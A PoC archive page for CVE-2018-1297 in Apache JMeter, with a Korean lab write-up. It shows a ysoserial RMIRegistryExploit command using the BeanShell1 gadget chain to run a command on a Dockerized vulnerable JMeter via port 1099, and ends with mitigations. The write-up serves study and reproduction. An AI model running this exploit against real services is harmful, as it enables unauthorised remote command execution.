Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2018-1297 PoC — Apache JMeter 安全漏洞

Source
Associated Vulnerability
Title:Apache JMeter 安全漏洞 (CVE-2018-1297)
Description:Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件。 Apache JMeter 2.x版本和3.x版本中存在安全漏洞。攻击者可利用该漏洞获取JMeterEngine的访问权限并发送未授权的代码。
Readme
#
**<h1>Jmeter RMI 역직렬화 명령 실행 취약성 (CVE-2018-1297)</h1><br/>**
<br/>
Apache JMeter는 미국 아파치 소프트웨어 재단(American Apache Software Foundation)이 스트레스 테스트 및 성능 테스트를 위해 Java 언어로 작성한 오픈 소스 소프트웨어 세트입니다.<br/>
2.x 및 3.x 버전에는 역직렬화 취약점이 있으며, 공격자는 이 취약점을 이용하여 대상 서버에서 임의의 명령을 실행할 수 있습니다.<br/>
<br/>
<h2>취약성 환경 실행 :</h2><br/>

```
docker compose up -d
```
저는 칼리 리눅스에서 docker를 이용했습니다.<br/>
<br/>
실행이 완료되면 RMI 서비스가 시작되고 포트 1099를 수신합니다.<br/>
<br/>
<br/>
<h2>취약점 :</h2><br/>
ysoserial을 직접 사용하여 취약점 공격을 시행합니다.<br/>

```
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 BeanShell1 'touch /tmp/success’
```
위와 같은 명령어를 입력합니다.<br/> BeanShell1이라는 익스플로잇 체인을 이용했습니다.<br/>

```
docker compose exec jmeter bash
```
를 사용하여 컨테이너에 들어가면 '/tmp/success'가 성공적으로 생성된 것을 알 수 있습니다.<br/>
<img src = "https://user-images.githubusercontent.com/145894541/279195673-1a78ed24-c344-4ff7-842e-bdd592760078.jpg" width="90%"></img>
<br/>
<img src = "https://user-images.githubusercontent.com/145894541/279195860-68289fe6-82e7-4d12-9ee5-c92f3d1a9ba8.jpg" width="90%"></img>
#
<br/>
<h2>정리</h2> <br/>
이 취약점은 Java 기반의 애플리케이션에서 발생할 수 있는 RMI(Remote Method Invocation) 취약점을 악용하는 것입니다.<br/>
여기에서 사용된 ‘ysoserial-0.0.6-SNAPSHOT-all.jar’는 ysoserial 프로젝트의 일부이며, java 직렬화 취약점을 악용하여 원격 코드 실행을 허용하는 페이로드를 생성하는 데 사용됩니다.<br/>
<br/>
이 페이로드는 /tmp/success와 같은 명령을 실행하려는 목적을 가지고 있으며, 이 취약점을 통해 공격자는 원격 시스템에서 임의의 명령을 실행하거나 시스템 파일을 수정할 수 있습니다.<br/>
이 취약점을 방해하기 위한 조치로는 RMI 서비스의 액세스 제한, 엄격한 권한 제어 및 java 직렬화 필터링 등이 있습니다.<br/>


File Snapshot

[4.0K] /data/pocs/70a22ab4438d3ac530214ef51ae5672b7a4a1e77 ├── [ 25K] 이미지 2023. 10. 31. 오전 5.47.jpg ├── [ 51K] 이미지 2023. 10. 31. 오전 5.59.jpg ├── [1.9K] CVE-2018-1297 ├── [2.3K] README.md ├── [ 25K] 이미지 2023. 10. 31. 오전 5.47.jpg └── [ 51K] 이미지 2023. 10. 31. 오전 5.59.jpg 0 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.